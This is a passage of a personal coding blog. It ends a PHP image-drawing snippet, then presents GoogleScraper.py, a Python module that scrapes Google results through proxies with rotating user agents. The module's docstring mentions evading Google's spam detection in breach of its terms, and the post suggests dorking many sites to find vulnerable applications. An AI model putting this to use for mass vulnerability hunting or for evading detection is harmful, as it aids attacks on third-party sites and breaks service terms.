<span class="nv">$e</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The left vertical bar</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">)</span>
<span class="nv">$e</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="c1">// The three balks of the 'E'</span>
<span class="k">if</span> <span class="p">(((</span><span class="nv">$i</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="mi">2</span><span class="p">))</span>
<span class="cm">/* prevent out of bounds indices */</span>
<span class="o">&&</span> <span class="nv">$j</span> <span class="o">></span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
<span class="nv">$e</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$e</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>GoogleScraper.py - A simple python module to parse google search results.2013-01-06T21:27:00+01:002013-01-06T21:27:00+01:00Nikolai Tschachertag:incolumitas.com,2013-01-06:/2013/01/06/googlesearch-a-rapid-python-class-to-get-search-results/<p><strong>UPDATE on 18th February 2014:</strong></p>
<p>This python module has now <a href="https://github.com/NikolaiT/GoogleScraper" title="github repo for GoogleScraper">its own github
repository</a>!</p>
<p>The plugin can extract</p>
<ul>
<li>All links</li>
<li>Link titles</li>
<li>The description/caption below the links</li>
</ul>
<p>and has the following features:</p>
<ul>
<li>Advanced proxy support for SOCKS4/4a/5 and HTTP PROXY</li>
<li>Multithreading</li>
<li>XPATH parsing</li>
<li>Supports almost <a href="http://www.google.com/support/enterprise/static/gsa/docs/admin/70/gsa_doc_set/xml_reference/" title="search protocol reference">all search
parameters</a></li>
</ul>
<p>Please note that this is by no means a permanent version! Heavy
structural changes will be implemented in the near future (I'll
experiment with asynchronous networking for instance). But on this site,
I will always host a working version with instructions how to use it,
such that visitors can always use the script!</p>
<p><strong>1. Edit (07.01.2013):</strong></p>
<ul>
<li>Using requests instead of urllib</li>
<li>Added random User Agents for every new search.</li>
<li>Cleaned the code</li>
<li>Implemented foundation to combine with proxychains</li>
</ul>
<h3>Original Blog Post</h3>
<p>Sample output after searching for 'cats are not cute' (sorry) with 100
results per page on 3 ascending pages:
<a href="https://incolumitas.com/uploads/2013/01/out.txt">results.txt</a></p>
<p>I always was in need of a fast and reliable working python module to
query the google search engine. The google API is rubbish, because they
just give you maximally 36 results. This is completly inacceptable!</p>
<p>So, I looked further and found <a href="http://code.google.com/p/pygoogle/">http://code.google …</a></p><p><strong>UPDATE on 18th February 2014:</strong></p>
<p>This python module has now <a href="https://github.com/NikolaiT/GoogleScraper" title="github repo for GoogleScraper">its own github
repository</a>!</p>
<p>The plugin can extract</p>
<ul>
<li>All links</li>
<li>Link titles</li>
<li>The description/caption below the links</li>
</ul>
<p>and has the following features:</p>
<ul>
<li>Advanced proxy support for SOCKS4/4a/5 and HTTP PROXY</li>
<li>Multithreading</li>
<li>XPATH parsing</li>
<li>Supports almost <a href="http://www.google.com/support/enterprise/static/gsa/docs/admin/70/gsa_doc_set/xml_reference/" title="search protocol reference">all search
parameters</a></li>
</ul>
<p>Please note that this is by no means a permanent version! Heavy
structural changes will be implemented in the near future (I'll
experiment with asynchronous networking for instance). But on this site,
I will always host a working version with instructions how to use it,
such that visitors can always use the script!</p>
<p><strong>1. Edit (07.01.2013):</strong></p>
<ul>
<li>Using requests instead of urllib</li>
<li>Added random User Agents for every new search.</li>
<li>Cleaned the code</li>
<li>Implemented foundation to combine with proxychains</li>
</ul>
<h3>Original Blog Post</h3>
<p>Sample output after searching for 'cats are not cute' (sorry) with 100
results per page on 3 ascending pages:
<a href="https://incolumitas.com/uploads/2013/01/out.txt">results.txt</a></p>
<p>I always was in need of a fast and reliable working python module to
query the google search engine. The google API is rubbish, because they
just give you maximally 36 results. This is completly inacceptable!</p>
<p>So, I looked further and found <a href="http://code.google.com/p/pygoogle/">http://code.google.com/p/pygoogle/</a>,
which is not what we want. They say:</p>
<blockquote>
<p><em>pygoogle is a </em><em>very basic</em><em> Google search module for Python. It has
a limitation of only 64 results. If you want more results, see
xgoogle.<a href="http://www.catonmat.net/blog/python-library-for-google-translate/"><br>
</a></em></p>
</blockquote>
<p>Le optimistic me goes to the homepage of
<a href="http://www.catonmat.net/blog/python-library-for-google-search/">xgoogle</a>,
just to be disappointed again. The module seems broken and imports some
outdated libraries and is generally very very large. The author probably
did a nice job, but I immediately realized that I have to implement my
own. This was unacceptable, since my python programming knowledge and
coding style really lacks any depth and profundity.</p>
<p><strong>The module should basically satisfy two purposes:</strong></p>
<ul>
<li>Parse arbitrary number of pages with maximally number of search
results per page.</li>
<li>Clean the found urls from badboys like 'gstatic.com' or 'google.com'</li>
</ul>
<p><strong>What can you use the module for?</strong></p>
<ul>
<li>Statistics</li>
<li>Find vulnerable applications</li>
<li>scanning lots of sites with dorks (with intext, inurl, site
parameters usable in the query!)</li>
</ul>
<p><strong>To-do list (06.01.2013):</strong></p>
<ul>
<li>Clean the code. Treat all errors correctly and make the script more
robust.</li>
<li>Add functionality, like a parallel yahoo and bing search to compare
the search results to gain maximal knowledge!</li>
<li>Provide better configuration freedom. There are a lot of google
search parameters :/</li>
<li>Maybe: Port to Python 2.7</li>
</ul>
<h3>Usage</h3>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">GoogleScraper</span>
<span class="kn">import</span> <span class="nn">urllib.parse</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">results</span> <span class="o">=</span> <span class="n">GoogleScraper</span><span class="o">.</span><span class="n">scrape</span><span class="p">(</span><span class="s1">'Best SEO tool'</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span> <span class="n">num_pages</span><span class="o">=</span><span class="mi">3</span><span class="p">,</span> <span class="n">offset</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
<span class="k">for</span> <span class="n">page</span> <span class="ow">in</span> <span class="n">results</span><span class="p">:</span>
<span class="k">for</span> <span class="n">link_title</span><span class="p">,</span> <span class="n">link_snippet</span><span class="p">,</span> <span class="n">link_url</span> <span class="ow">in</span> <span class="n">page</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]:</span>
<span class="c1"># You can access all parts of the search results like that</span>
<span class="c1"># link_url.scheme => URL scheme specifier (Ex: 'http')</span>
<span class="c1"># link_url.netloc => Network location part (Ex: 'www.python.org')</span>
<span class="c1"># link_url.path => URL scheme specifier (Ex: ''help/Python.html'')</span>
<span class="c1"># link_url.params => Parameters for last path element</span>
<span class="c1"># link_url.query => Query component</span>
<span class="k">try</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">unquote</span><span class="p">(</span><span class="n">link_url</span><span class="o">.</span><span class="n">geturl</span><span class="p">()))</span> <span class="c1"># This reassembles the parts of the url to the whole thing</span>
<span class="k">except</span><span class="p">:</span>
<span class="k">pass</span>
<span class="c1"># How many urls did we get on all pages?</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">sum</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">page</span><span class="p">[</span><span class="s1">'results'</span><span class="p">])</span> <span class="k">for</span> <span class="n">page</span> <span class="ow">in</span> <span class="n">results</span><span class="p">))</span>
<span class="c1"># How many hits has google found with our keyword (as shown on the first page)?</span>
<span class="nb">print</span><span class="p">(</span><span class="n">results</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="s1">'num_results_for_kw'</span><span class="p">])</span>
</code></pre></div>
<p><strong>[Warning: This description is deprecated, the sources are fresh
tough]</strong></p>
<p>How it works: Basically you create a GoogleScraper object with the
query to search. You also specify the number of results per page
(10,25,50 or 100) you want to obtain. Then you call the method search()
on the new made object with a parameter indicating the number of pages
too search for. I didn't try how many pages I can scrape\^\^ It's up to
you to tell me!</p>
<p>The GoogleScraper.search() methods returns a list of special tuples!
Each of these tuples represents a URL. If you want to know more about
this special tupel, please read the python
<a href="http://docs.python.org/3.2/library/urllib.parse.html#url-parsing">documentation</a>.</p>
<p>The module is here:</p>
<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span class="normal"> 1</span>
<span class="normal"> 2</span>
<span class="normal"> 3</span>
<span class="normal"> 4</span>
<span class="normal"> 5</span>
<span class="normal"> 6</span>
<span class="normal"> 7</span>
<span class="normal"> 8</span>
<span class="normal"> 9</span>
<span class="normal"> 10</span>
<span class="normal"> 11</span>
<span class="normal"> 12</span>
<span class="normal"> 13</span>
<span class="normal"> 14</span>
<span class="normal"> 15</span>
<span class="normal"> 16</span>
<span class="normal"> 17</span>
<span class="normal"> 18</span>
<span class="normal"> 19</span>
<span class="normal"> 20</span>
<span class="normal"> 21</span>
<span class="normal"> 22</span>
<span class="normal"> 23</span>
<span class="normal"> 24</span>
<span class="normal"> 25</span>
<span class="normal"> 26</span>
<span class="normal"> 27</span>
<span class="normal"> 28</span>
<span class="normal"> 29</span>
<span class="normal"> 30</span>
<span class="normal"> 31</span>
<span class="normal"> 32</span>
<span class="normal"> 33</span>
<span class="normal"> 34</span>
<span class="normal"> 35</span>
<span class="normal"> 36</span>
<span class="normal"> 37</span>
<span class="normal"> 38</span>
<span class="normal"> 39</span>
<span class="normal"> 40</span>
<span class="normal"> 41</span>
<span class="normal"> 42</span>
<span class="normal"> 43</span>
<span class="normal"> 44</span>
<span class="normal"> 45</span>
<span class="normal"> 46</span>
<span class="normal"> 47</span>
<span class="normal"> 48</span>
<span class="normal"> 49</span>
<span class="normal"> 50</span>
<span class="normal"> 51</span>
<span class="normal"> 52</span>
<span class="normal"> 53</span>
<span class="normal"> 54</span>
<span class="normal"> 55</span>
<span class="normal"> 56</span>
<span class="normal"> 57</span>
<span class="normal"> 58</span>
<span class="normal"> 59</span>
<span class="normal"> 60</span>
<span class="normal"> 61</span>
<span class="normal"> 62</span>
<span class="normal"> 63</span>
<span class="normal"> 64</span>
<span class="normal"> 65</span>
<span class="normal"> 66</span>
<span class="normal"> 67</span>
<span class="normal"> 68</span>
<span class="normal"> 69</span>
<span class="normal"> 70</span>
<span class="normal"> 71</span>
<span class="normal"> 72</span>
<span class="normal"> 73</span>
<span class="normal"> 74</span>
<span class="normal"> 75</span>
<span class="normal"> 76</span>
<span class="normal"> 77</span>
<span class="normal"> 78</span>
<span class="normal"> 79</span>
<span class="normal"> 80</span>
<span class="normal"> 81</span>
<span class="normal"> 82</span>
<span class="normal"> 83</span>
<span class="normal"> 84</span>
<span class="normal"> 85</span>
<span class="normal"> 86</span>
<span class="normal"> 87</span>
<span class="normal"> 88</span>
<span class="normal"> 89</span>
<span class="normal"> 90</span>
<span class="normal"> 91</span>
<span class="normal"> 92</span>
<span class="normal"> 93</span>
<span class="normal"> 94</span>
<span class="normal"> 95</span>
<span class="normal"> 96</span>
<span class="normal"> 97</span>
<span class="normal"> 98</span>
<span class="normal"> 99</span>
<span class="normal">100</span>
<span class="normal">101</span>
<span class="normal">102</span>
<span class="normal">103</span>
<span class="normal">104</span>
<span class="normal">105</span>
<span class="normal">106</span>
<span class="normal">107</span>
<span class="normal">108</span>
<span class="normal">109</span>
<span class="normal">110</span>
<span class="normal">111</span>
<span class="normal">112</span>
<span class="normal">113</span>
<span class="normal">114</span>
<span class="normal">115</span>
<span class="normal">116</span>
<span class="normal">117</span>
<span class="normal">118</span>
<span class="normal">119</span>
<span class="normal">120</span>
<span class="normal">121</span>
<span class="normal">122</span>
<span class="normal">123</span>
<span class="normal">124</span>
<span class="normal">125</span>
<span class="normal">126</span>
<span class="normal">127</span>
<span class="normal">128</span>
<span class="normal">129</span>
<span class="normal">130</span>
<span class="normal">131</span>
<span class="normal">132</span>
<span class="normal">133</span>
<span class="normal">134</span>
<span class="normal">135</span>
<span class="normal">136</span>
<span class="normal">137</span>
<span class="normal">138</span>
<span class="normal">139</span>
<span class="normal">140</span>
<span class="normal">141</span>
<span class="normal">142</span>
<span class="normal">143</span>
<span class="normal">144</span>
<span class="normal">145</span>
<span class="normal">146</span>
<span class="normal">147</span>
<span class="normal">148</span>
<span class="normal">149</span>
<span class="normal">150</span>
<span class="normal">151</span>
<span class="normal">152</span>
<span class="normal">153</span>
<span class="normal">154</span>
<span class="normal">155</span>
<span class="normal">156</span>
<span class="normal">157</span>
<span class="normal">158</span>
<span class="normal">159</span>
<span class="normal">160</span>
<span class="normal">161</span>
<span class="normal">162</span>
<span class="normal">163</span>
<span class="normal">164</span>
<span class="normal">165</span>
<span class="normal">166</span>
<span class="normal">167</span>
<span class="normal">168</span>
<span class="normal">169</span>
<span class="normal">170</span>
<span class="normal">171</span>
<span class="normal">172</span>
<span class="normal">173</span>
<span class="normal">174</span>
<span class="normal">175</span>
<span class="normal">176</span>
<span class="normal">177</span>
<span class="normal">178</span>
<span class="normal">179</span>
<span class="normal">180</span>
<span class="normal">181</span>
<span class="normal">182</span>
<span class="normal">183</span>
<span class="normal">184</span>
<span class="normal">185</span>
<span class="normal">186</span>
<span class="normal">187</span>
<span class="normal">188</span>
<span class="normal">189</span>
<span class="normal">190</span>
<span class="normal">191</span>
<span class="normal">192</span>
<span class="normal">193</span>
<span class="normal">194</span>
<span class="normal">195</span>
<span class="normal">196</span>
<span class="normal">197</span>
<span class="normal">198</span>
<span class="normal">199</span>
<span class="normal">200</span>
<span class="normal">201</span>
<span class="normal">202</span>
<span class="normal">203</span>
<span class="normal">204</span>
<span class="normal">205</span>
<span class="normal">206</span>
<span class="normal">207</span>
<span class="normal">208</span>
<span class="normal">209</span>
<span class="normal">210</span>
<span class="normal">211</span>
<span class="normal">212</span>
<span class="normal">213</span>
<span class="normal">214</span>
<span class="normal">215</span>
<span class="normal">216</span>
<span class="normal">217</span>
<span class="normal">218</span>
<span class="normal">219</span>
<span class="normal">220</span>
<span class="normal">221</span>
<span class="normal">222</span>
<span class="normal">223</span>
<span class="normal">224</span>
<span class="normal">225</span>
<span class="normal">226</span>
<span class="normal">227</span>
<span class="normal">228</span>
<span class="normal">229</span>
<span class="normal">230</span>
<span class="normal">231</span>
<span class="normal">232</span>
<span class="normal">233</span>
<span class="normal">234</span>
<span class="normal">235</span>
<span class="normal">236</span>
<span class="normal">237</span>
<span class="normal">238</span>
<span class="normal">239</span>
<span class="normal">240</span>
<span class="normal">241</span>
<span class="normal">242</span>
<span class="normal">243</span>
<span class="normal">244</span>
<span class="normal">245</span>
<span class="normal">246</span>
<span class="normal">247</span>
<span class="normal">248</span>
<span class="normal">249</span>
<span class="normal">250</span>
<span class="normal">251</span>
<span class="normal">252</span>
<span class="normal">253</span>
<span class="normal">254</span>
<span class="normal">255</span>
<span class="normal">256</span>
<span class="normal">257</span>
<span class="normal">258</span>
<span class="normal">259</span>
<span class="normal">260</span>
<span class="normal">261</span>
<span class="normal">262</span>
<span class="normal">263</span>
<span class="normal">264</span>
<span class="normal">265</span>
<span class="normal">266</span>
<span class="normal">267</span>
<span class="normal">268</span>
<span class="normal">269</span>
<span class="normal">270</span>
<span class="normal">271</span>
<span class="normal">272</span>
<span class="normal">273</span>
<span class="normal">274</span>
<span class="normal">275</span>
<span class="normal">276</span>
<span class="normal">277</span>
<span class="normal">278</span>
<span class="normal">279</span>
<span class="normal">280</span>
<span class="normal">281</span>
<span class="normal">282</span>
<span class="normal">283</span>
<span class="normal">284</span>
<span class="normal">285</span>
<span class="normal">286</span>
<span class="normal">287</span>
<span class="normal">288</span>
<span class="normal">289</span>
<span class="normal">290</span>
<span class="normal">291</span>
<span class="normal">292</span>
<span class="normal">293</span>
<span class="normal">294</span>
<span class="normal">295</span>
<span class="normal">296</span>
<span class="normal">297</span>
<span class="normal">298</span>
<span class="normal">299</span>
<span class="normal">300</span>
<span class="normal">301</span>
<span class="normal">302</span>
<span class="normal">303</span>
<span class="normal">304</span>
<span class="normal">305</span>
<span class="normal">306</span>
<span class="normal">307</span>
<span class="normal">308</span>
<span class="normal">309</span>
<span class="normal">310</span>
<span class="normal">311</span>
<span class="normal">312</span>
<span class="normal">313</span>
<span class="normal">314</span>
<span class="normal">315</span>
<span class="normal">316</span>
<span class="normal">317</span>
<span class="normal">318</span>
<span class="normal">319</span>
<span class="normal">320</span>
<span class="normal">321</span>
<span class="normal">322</span>
<span class="normal">323</span>
<span class="normal">324</span>
<span class="normal">325</span>
<span class="normal">326</span>
<span class="normal">327</span>
<span class="normal">328</span>
<span class="normal">329</span>
<span class="normal">330</span>
<span class="normal">331</span>
<span class="normal">332</span>
<span class="normal">333</span>
<span class="normal">334</span>
<span class="normal">335</span>
<span class="normal">336</span>
<span class="normal">337</span>
<span class="normal">338</span>
<span class="normal">339</span>
<span class="normal">340</span>
<span class="normal">341</span>
<span class="normal">342</span>
<span class="normal">343</span>
<span class="normal">344</span>
<span class="normal">345</span>
<span class="normal">346</span>
<span class="normal">347</span>
<span class="normal">348</span>
<span class="normal">349</span>
<span class="normal">350</span>
<span class="normal">351</span>
<span class="normal">352</span>
<span class="normal">353</span>
<span class="normal">354</span>
<span class="normal">355</span>
<span class="normal">356</span>
<span class="normal">357</span>
<span class="normal">358</span>
<span class="normal">359</span>
<span class="normal">360</span>
<span class="normal">361</span>
<span class="normal">362</span>
<span class="normal">363</span>
<span class="normal">364</span>
<span class="normal">365</span>
<span class="normal">366</span>
<span class="normal">367</span>
<span class="normal">368</span>
<span class="normal">369</span>
<span class="normal">370</span>
<span class="normal">371</span>
<span class="normal">372</span>
<span class="normal">373</span>
<span class="normal">374</span>
<span class="normal">375</span>
<span class="normal">376</span>
<span class="normal">377</span>
<span class="normal">378</span>
<span class="normal">379</span>
<span class="normal">380</span>
<span class="normal">381</span>
<span class="normal">382</span>
<span class="normal">383</span>
<span class="normal">384</span>
<span class="normal">385</span>
<span class="normal">386</span>
<span class="normal">387</span>
<span class="normal">388</span>
<span class="normal">389</span>
<span class="normal">390</span>
<span class="normal">391</span>
<span class="normal">392</span>
<span class="normal">393</span>
<span class="normal">394</span>
<span class="normal">395</span>
<span class="normal">396</span>
<span class="normal">397</span>
<span class="normal">398</span>
<span class="normal">399</span>
<span class="normal">400</span>
<span class="normal">401</span>
<span class="normal">402</span>
<span class="normal">403</span>
<span class="normal">404</span>
<span class="normal">405</span>
<span class="normal">406</span>
<span class="normal">407</span>
<span class="normal">408</span>
<span class="normal">409</span>
<span class="normal">410</span>
<span class="normal">411</span>
<span class="normal">412</span>
<span class="normal">413</span>
<span class="normal">414</span>
<span class="normal">415</span>
<span class="normal">416</span>
<span class="normal">417</span>
<span class="normal">418</span>
<span class="normal">419</span>
<span class="normal">420</span>
<span class="normal">421</span>
<span class="normal">422</span>
<span class="normal">423</span>
<span class="normal">424</span>
<span class="normal">425</span>
<span class="normal">426</span>
<span class="normal">427</span>
<span class="normal">428</span>
<span class="normal">429</span>
<span class="normal">430</span>
<span class="normal">431</span>
<span class="normal">432</span>
<span class="normal">433</span>
<span class="normal">434</span>
<span class="normal">435</span>
<span class="normal">436</span>
<span class="normal">437</span>
<span class="normal">438</span>
<span class="normal">439</span>
<span class="normal">440</span>
<span class="normal">441</span>
<span class="normal">442</span>
<span class="normal">443</span>
<span class="normal">444</span>
<span class="normal">445</span>
<span class="normal">446</span>
<span class="normal">447</span>
<span class="normal">448</span>
<span class="normal">449</span>
<span class="normal">450</span>
<span class="normal">451</span>
<span class="normal">452</span>
<span class="normal">453</span>
<span class="normal">454</span>
<span class="normal">455</span>
<span class="normal">456</span>
<span class="normal">457</span>
<span class="normal">458</span>
<span class="normal">459</span>
<span class="normal">460</span>
<span class="normal">461</span>
<span class="normal">462</span>
<span class="normal">463</span>
<span class="normal">464</span>
<span class="normal">465</span>
<span class="normal">466</span>
<span class="normal">467</span>
<span class="normal">468</span>
<span class="normal">469</span>
<span class="normal">470</span>
<span class="normal">471</span>
<span class="normal">472</span>
<span class="normal">473</span>
<span class="normal">474</span>
<span class="normal">475</span>
<span class="normal">476</span>
<span class="normal">477</span>
<span class="normal">478</span>
<span class="normal">479</span>
<span class="normal">480</span>
<span class="normal">481</span>
<span class="normal">482</span>
<span class="normal">483</span>
<span class="normal">484</span>
<span class="normal">485</span>
<span class="normal">486</span>
<span class="normal">487</span>
<span class="normal">488</span></pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python3</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="sd">"""</span>
<span class="sd">Complete rewrite.</span>
<span class="sd">Many thanks go to v3nz3n</span>
<span class="sd">This is a little module that uses Google to automate search</span>
<span class="sd">queries. It gives straightforward access to all relevant data of Google such as</span>
<span class="sd">- The links of the result page</span>
<span class="sd">- The title of the links</span>
<span class="sd">- The caption/description below each link</span>
<span class="sd">- The number of results for this keyword</span>
<span class="sd">GoogleScraper's architecture outlined:</span>
<span class="sd">- Proxy support (Socks5, Socks4, HTTP Proxy)</span>
<span class="sd">- Threading support</span>
<span class="sd">The module implements some countermeasures to circumvent spamming detection</span>
<span class="sd">from the Google Servers:</span>
<span class="sd">{List them here}</span>
<span class="sd">Note: Scraping compromises the google terms of service (TOS).</span>
<span class="sd">"""</span>
<span class="n">__VERSION__</span> <span class="o">=</span> <span class="s1">'0.4'</span>
<span class="n">__UPDATED__</span> <span class="o">=</span> <span class="s1">'17.02.2014'</span> <span class="c1"># day.month.year</span>
<span class="n">__AUTHOR__</span> <span class="o">=</span> <span class="s1">'Nikolai Tschacher'</span>
<span class="n">__WEBSITE__</span> <span class="o">=</span> <span class="s1">'incolumitas.com'</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">logging</span>
<span class="kn">import</span> <span class="nn">argparse</span>
<span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">from</span> <span class="nn">collections</span> <span class="kn">import</span> <span class="n">namedtuple</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">urllib.parse</span>
<span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">choice</span>
<span class="k">try</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">from</span> <span class="nn">cssselect</span> <span class="kn">import</span> <span class="n">HTMLTranslator</span><span class="p">,</span> <span class="n">SelectorError</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">UnicodeDammit</span>
<span class="kn">import</span> <span class="nn">socks</span> <span class="c1"># should be in the same directory</span>
<span class="k">except</span> <span class="ne">ImportError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">e</span><span class="o">.</span><span class="n">msg</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'You can install missing modules with `pip install [modulename]`'</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># module wide global variables and configuration</span>
<span class="c1"># First obtain a logger</span>
<span class="n">logger</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">getLogger</span><span class="p">(</span><span class="s1">'GoogleScraper'</span><span class="p">)</span>
<span class="n">logger</span><span class="o">.</span><span class="n">setLevel</span><span class="p">(</span><span class="n">logging</span><span class="o">.</span><span class="n">INFO</span><span class="p">)</span>
<span class="n">ch</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">StreamHandler</span><span class="p">(</span><span class="n">stream</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="n">ch</span><span class="o">.</span><span class="n">setLevel</span><span class="p">(</span><span class="n">logging</span><span class="o">.</span><span class="n">INFO</span><span class="p">)</span>
<span class="n">formatter</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">Formatter</span><span class="p">(</span><span class="s1">'</span><span class="si">%(asctime)s</span><span class="s1"> - </span><span class="si">%(name)s</span><span class="s1"> - </span><span class="si">%(levelname)s</span><span class="s1"> - </span><span class="si">%(message)s</span><span class="s1">'</span><span class="p">)</span>
<span class="n">ch</span><span class="o">.</span><span class="n">setFormatter</span><span class="p">(</span><span class="n">formatter</span><span class="p">)</span>
<span class="n">logger</span><span class="o">.</span><span class="n">addHandler</span><span class="p">(</span><span class="n">ch</span><span class="p">)</span>
<span class="c1"># Whether caching shall be enabled</span>
<span class="n">DO_CACHING</span> <span class="o">=</span> <span class="kc">True</span>
<span class="c1"># The directory path for cached google results</span>
<span class="n">CACHEDIR</span> <span class="o">=</span> <span class="s1">'.scrapecache/'</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">mkdir</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="mo">0o744</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">GoogleSearchError</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">pass</span>
<span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="s1">'Exception in GoogleSearch class'</span>
<span class="k">class</span> <span class="nc">InvalidNumberResultsException</span><span class="p">(</span><span class="n">GoogleSearchError</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">number_of_results</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">nres</span> <span class="o">=</span> <span class="n">number_of_results</span>
<span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="s1">'</span><span class="si">{}</span><span class="s1"> is not a valid number of results per page'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">nres</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">maybe_clean_cache</span><span class="p">():</span>
<span class="sd">"""Delete all .cache files in the cache directory that are older than 12 hours."""</span>
<span class="k">for</span> <span class="n">fname</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">):</span>
<span class="k">if</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span> <span class="o">></span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">))</span> <span class="o">+</span> <span class="p">(</span><span class="mi">60</span> <span class="o">*</span> <span class="mi">60</span> <span class="o">*</span> <span class="mi">12</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">))</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
<span class="c1"># Clean the CACHEDIR once in a while</span>
<span class="n">maybe_clean_cache</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">cached_file_name</span><span class="p">(</span><span class="n">search_params</span><span class="p">):</span>
